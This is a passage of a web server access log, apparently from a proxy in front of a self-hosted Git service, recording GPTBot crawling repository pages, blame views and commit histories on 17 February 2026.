[Gzip 5.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/Old_GoldMonitor.py" -[17/Feb/2026:15:44:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.gitignore?display=source" [Client 74.7.227.38] [Length 12219] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.gitignore" -[17/Feb/2026:15:44:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js.good?display=source" [Client 74.7.227.38] [Length 20452] [Gzip 5.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js.good" -[17/Feb/2026:15:44:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/README.md?display=rendered" [Client 74.7.227.38] [Length 13341] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/README.md" -[17/Feb/2026:15:44:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/dcsintegration.png" -[17/Feb/2026:15:44:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/assets/images/dcsintegration.png" -[17/Feb/2026:15:44:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/dcsintegration.png" -[17/Feb/2026:15:44:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/assets/images/dcsintegration.png" -[17/Feb/2026:15:44:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 10033] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/dcsintegration.png" -[17/Feb/2026:15:44:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/dcsintegration.png?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/dcsintegration.png" -[17/Feb/2026:15:44:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/dcsintegration.png" -[17/Feb/2026:15:44:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/README.md?display=rendered" [Client 74.7.227.38] [Length 13343] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/README.md" -[17/Feb/2026:15:44:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.gitignore?display=source" [Client 74.7.227.38] [Length 12221] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.gitignore" -[17/Feb/2026:15:44:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker?display=rendered" [Client 74.7.227.38] [Length 16057] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker" -[17/Feb/2026:15:44:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10938] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.gitignore" -[17/Feb/2026:15:44:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js.good2?display=source" [Client 74.7.227.38] [Length 21983] [Gzip 5.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js.good2" -[17/Feb/2026:15:44:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/claude.md?display=source" [Client 74.7.227.38] [Length 15374] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/claude.md" -[17/Feb/2026:15:44:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js.good2?display=rendered" [Client 74.7.227.38] [Length 10891] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js.good2" -[17/Feb/2026:15:44:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 1377] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/dcsintegration.png" -[17/Feb/2026:15:44:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/claude.md?display=rendered" [Client 74.7.227.38] [Length 13444] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/claude.md" -[17/Feb/2026:15:44:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10943] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.gitignore" -[17/Feb/2026:15:44:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker?display=rendered" [Client 74.7.227.38] [Length 16020] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker" -[17/Feb/2026:15:44:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js.good?display=rendered" [Client 74.7.227.38] [Length 10893] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js.good" -[17/Feb/2026:15:44:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/About.tsx?display=rendered" [Client 74.7.227.38] [Length 11136] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/About.tsx" -[17/Feb/2026:15:44:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/index.html?display=source" [Client 74.7.227.38] [Length 31030] [Gzip 9.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/index.html" -[17/Feb/2026:15:44:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/index.html?display=rendered" [Client 74.7.227.38] [Length 10923] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/index.html" -[17/Feb/2026:15:44:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js?display=source" [Client 74.7.227.38] [Length 25543] [Gzip 7.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js" -[17/Feb/2026:15:44:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js?display=rendered" [Client 74.7.227.38] [Length 10883] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js" -[17/Feb/2026:15:44:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.gitignore?display=source" [Client 74.7.227.38] [Length 11127] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.gitignore" -[17/Feb/2026:15:44:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/milestones?sort=furthestduedate&state=closed" [Client 74.7.227.38] [Length 8500] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/milestones?q=&sort=furthestduedate&state=open" -[17/Feb/2026:15:44:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/projects?q=&sort=alphabetically&state=open" [Client 74.7.227.38] [Length 7805] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/projects" -[17/Feb/2026:15:44:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10982] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:15:44:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.html?display=source" [Client 74.7.227.38] [Length 31029] [Gzip 9.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.html" -[17/Feb/2026:15:44:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.html?display=rendered" [Client 74.7.227.38] [Length 10925] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.html" -[17/Feb/2026:15:44:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/services/geminiService.ts?display=source" [Client 74.7.227.38] [Length 13388] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/services/geminiService.ts" -[17/Feb/2026:15:44:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-2_access.log" [Client 74.7.227.38] [Length 29708] [Gzip 11.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs" -[17/Feb/2026:15:44:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-1_access.log" [Client 74.7.227.38] [Length 42977] [Gzip 16.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs" -[17/Feb/2026:15:44:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-3_access.log" [Client 74.7.227.38] [Length 47115] [Gzip 12.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs" -[17/Feb/2026:15:44:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_access.log" [Client 74.7.227.38] [Length 406929] [Gzip 15.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs" -[17/Feb/2026:15:44:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 10890] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/docker-compose.yml" -[17/Feb/2026:15:44:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10606] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:44:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 13339] [Gzip 4.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:44:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 13339] [Gzip 4.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:44:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 12050] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:44:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 11398] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:44:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10603] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:44:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-2_access.log" [Client 74.7.227.38] [Length 38814] [Gzip 17.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-2_access.log" -[17/Feb/2026:15:44:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-1_access.log" [Client 74.7.227.38] [Length 61546] [Gzip 22.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-1_access.log" -[17/Feb/2026:15:44:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-3_access.log" [Client 74.7.227.38] [Length 62144] [Gzip 18.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-3_access.log" -[17/Feb/2026:15:44:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-1_access.log" [Client 74.7.227.38] [Length 10458] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-1_access.log" -[17/Feb/2026:15:44:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_access.log" [Client 74.7.227.38] [Length 546191] [Gzip 22.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_access.log" -[17/Feb/2026:15:44:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15177] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:44:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11604] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:44:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11049] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:44:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr 